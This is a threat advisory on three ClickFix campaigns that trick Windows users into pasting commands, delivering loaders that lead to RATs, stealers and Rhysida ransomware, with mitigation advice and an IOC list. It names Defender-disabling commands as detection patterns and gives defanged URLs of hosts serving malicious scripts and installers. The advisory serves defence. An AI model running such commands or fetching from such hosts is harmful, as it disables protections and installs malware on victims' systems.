TA Number
TA2026176Threat Advisory • Attack Report
Three separate ClickFix campaigns trick Windows users into pasting malicious commands, each delivering a distinct loader — Potemkin, BabaDeda Loader, and Lorem Ipsum Loader — that culminate in RMMProject, EtherRAT, DanaBot, SectopRAT, and Rhysida ransomware tied to threat actor Rapid Brigantine.
TA2026176A1Section 01
This Attack Report documents three separate ClickFix campaigns, first seen in May 2026, that trick Windows users across the globe into pasting attacker-supplied commands into the system — with each campaign delivering a different loader. The ClickFix lures abuse Google Chrome, Mozilla Firefox, Microsoft Edge, Microsoft Defender, and compromised WordPress sites to reach victims in Education, Financial Services, Architecture, Legal Services, Non-profit, Construction Technology, and Content Publishing.
The Potemkin loader drops the RMMProject RAT alongside EtherRAT, which spread across more than 11 hosts to reach the domain controller. The BabaDeda Loader delivers a .NET stealer plus the DanaBot and SectopRAT stealers. The Lorem Ipsum Loader, tied to the threat actor Rapid Brigantine (a.k.a. Vanilla Tempest, Vice Society, Vice Spider, DEV-0832), installs a backdoor that leads to Oyster, Supper, and MeowBackConn, ending in Rhysida ransomware deployment.
Section 02
All three ClickFix campaigns begin with ClickFix social engineering. Users visiting compromised or malicious websites are shown a fake browser-update, security-update, or CAPTCHA-style prompt instructing them to open a Windows utility, the Run dialog, or Windows Terminal, and paste an attacker-supplied command. In one chain, the pasted command abuses pcalua.exe as a living-off-the-land binary to proxy mshta.exe execution, which fetches a remote HTA that hides its window and silently downloads and installs an MSI.
In another ClickFix chain, a PowerShell command masquerading as a Microsoft Edge security intelligence update downloads a ZIP archive together with a portable, legitimately signed Node.js runtime, then launches an embedded JavaScript dropper with a hidden window and a second hidden PowerShell process with execution policy set to Bypass. A third chain presents a fake verification prompt to run a PowerShell command that stages further components. Delivery infrastructure includes at least five compromised WordPress sites spanning architecture, legal services, non-profit, construction technology, and content publishing, plus a rotating pool of themed fake-update domains. After initial execution, each chain stages a modular, multi-component Loader.
The Potemkin loader had one simple job: to deliver the next piece of malware. After the ClickFix trick installed it through an MSI file, Potemkin found its command server and loaded a tool called RMMProject straight into memory, never saving it to disk. RMMProject is the part that did the real damage — stealing browser passwords and cookies, secretly controlling the screen, and slipping its code into other programs. The attacker also dropped EtherRAT (a backdoor that hides its server address on the blockchain) and set up tunneling tools to move around the network, eventually spreading EtherRAT to more than 11 machines, including the domain controller.
BabaDeda Loader delivered its malware in two different ways. One path installed a backdoor and information stealer that scans the computer, opens a secret connection to the attacker's server, and steals browser cookies, saved passwords, and files when told to. The other path dropped a fake software package that used a trusted program to load malicious code and pulled its real payload out of a hidden file, then launched the DanaBot and SectopRAT stealers in memory.
The Lorem Ipsum chain in this set is operationally tied with high confidence to Rapid Brigantine, a financially motivated group active since at least mid-2022 and known for deploying Rhysida, BlackCat, Zeppelin, and Quantum Locker ransomware. The group is documented using trojanized installers signed through a malware-signing-as-a-service provider, which matches the pipeline behind earlier Lorem Ipsum activity, and the late-May pivot to ClickFix followed directly from the takedown of that certificate supply, leaving an unsigned delivery path as the only viable option.
A separately documented intrusion deployed the Lorem Ipsum Loader alongside MeowBackConn on domain controllers, placing the loader squarely inside the group's established post-exploitation arsenal (Oyster, Supper, MeowBackConn) that culminates in Rhysida deployment. Whether the Lorem Ipsum operators are Rapid Brigantine personnel directly or a closely allied development team feeding tooling into the group's pipeline remains an open intelligence gap, but the operational linkage holds either way.
Section 03
Use Group Policy to disable the Run dialog and the Win+R hotkey, and restrict wt.exe where feasible. Every ClickFix chain in this advisory depends on the user pasting a command into one of these; if the prompt never opens, the attack fails at the first step.
Use AppLocker or Windows Defender Application Control to prevent PowerShell, node.exe, mshta.exe, and pcalua.exe from running scripts or binaries staged in C:\ProgramData, AppData, and Temp directories.
Treat wt.exe or a browser spawning PowerShell download cradles, pcalua.exe proxying mshta.exe, and portable node.exe executing from C:\ProgramData as high-fidelity detections.
Turn on Microsoft Defender tamper protection and raise high-priority alerts on Stop-Service WinDefend, sc.exe config WinDefend start= disabled, bulk Add-MpPreference -ExclusionPath operations, and Set-MpPreference disable toggles.
Section 04
| Type | Value |
|---|---|
| SHA256 |
2abe5dd3a057fdef935722e50e9251c272d29fd26113187b853a1f9a9cb89d9b3b7ae925e2d64522b4f69b56285b05aeca8c5aab5ab46a9c02c4fafb69d881cecd4e5e2c65b1660470d3446539ee68adf5faeece3eaeb46583623be9911ee14579f7b67ce8b39070f3e1c2b90fce0ce84134782a7dedcccc1edac197ee9e089b2ada24dd6e517f37942b749c2bd57ddd97445e9853002cee70a0bc30d0b0ce3a97bc78ad3fd6549f3a7f9cb31be1ff25d50bac97c42fc6dfff44e47424c5add1dff20059f161090c76f9f45ac2269f2965bdc96023c78c1072f8d1aa66b06919
|
| IPv4 |
77[.]110[.]122[.]58213[.]165[.]41[.]2651[.]222[.]96[.]58
|
| IPv4:Port |
213[.]165[.]41[.]26[:]2260351[.]222[.]96[.]58[:]1080
|
| Domains |
cl[.]distritovagas[.]comsonra[.]eutialyson[.]comanus-staylard[.]xyzpestrear-lamp[.]xyzuglyshop-mare[.]xyzrule-bead-dust[.]xyzfair-bath-fond[.]xyzresumeacceptable[.]comautoupdatet[.]comautoupdaters[.]comautoupdatethis[.]comopenanyworddocument[.]comkittyfreespace[.]comsearchdocumentsfree[.]comletsdiskuss[.]comdigitalpoint[.]com
|
| URL |
hxxps[:]//cl[.]distritovagas[.]com/hte[.]htahxxps[:]//sonra[.]eutialyson[.]com/inst24[.]msihxxp[:]//77[.]110[.]122[.]58[:]23205/lQhEQui9a4lZ[.]exehxxp[:]//77[.]110[.]122[.]58[:]23205/cons_1[.]0[.]1[.]msihxxp[:]//77[.]110[.]122[.]58[:]44479/bjxxUmG8K3uy[.]ps1hxxps[:]//autoupdatet[.]com/get_update?i=75975hxxps[:]//openanyworddocument[.]com/api/init/40237612-00ac-4a85-bce9-7400f148c474
|
| Filenames |
RunSearch.exe, avast_update.bin, inst24.msi, cons_1.0.1.msi, hte.hta, Update.js, Update.zip, msedge.zip, NET Runtime Optimization Service.exe, mscoree.dll, msvcp140.dll, c8w2i9KUtgpF.bat, List.Control.dat, linguist.zip, EGGjVyW9Uloz.msi, MTSetup_v15.3.7191.msi, netdrv.dll, askndfao.dll, lQhEQui9a4lZ.exe, D0OK1nWwId9W.ps1, O67tak2KFRmJ.ps1, J6Gupb9TpYNI.ps1, fsjH6IHuUkhh.ps1, yH88LG8yCOnU.ps1, ek_full.ps1, ek_kill_av.ps1, ek_disable_av.ps1, RlLF3rizah.ini, MseKOytIWeVrP85.xml, EkYqfsgfyz.ini
|
| File Path |
C:\Users\<username>\AppData\Local\Microsoft\RunSearch\RunSearch.exe
|
| File Paths |
%LOCALAPPDATA%\hyper-v.ver%TEMP%\dll_debug.logC:\ProgramData\p\C:\Users\<username>\AppData\Local\KafhCqGLhOS4\C:\ProgramData\.NET Runtime Optimization Service c8w2i9KUtgpF\C:\Windows\SysWOW64\config\systemprofile\AppData\Local\FdgW2ni2h0it\sq8whb\node.exe
|
| Registry Key |
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RunSearchHKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsHostHKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EdgeUpdate
|
| Ethereum Contract Address |
0xb3f2897f2bc797e5b9033faef8c81e92b01cb8310x40b57c3622c1CbfD699207F71F2dE5A8Fe256893
|
| UUID |
ab653feb-9e78-4578-87ed-2e30329fe858
|
Section 05
Section 06
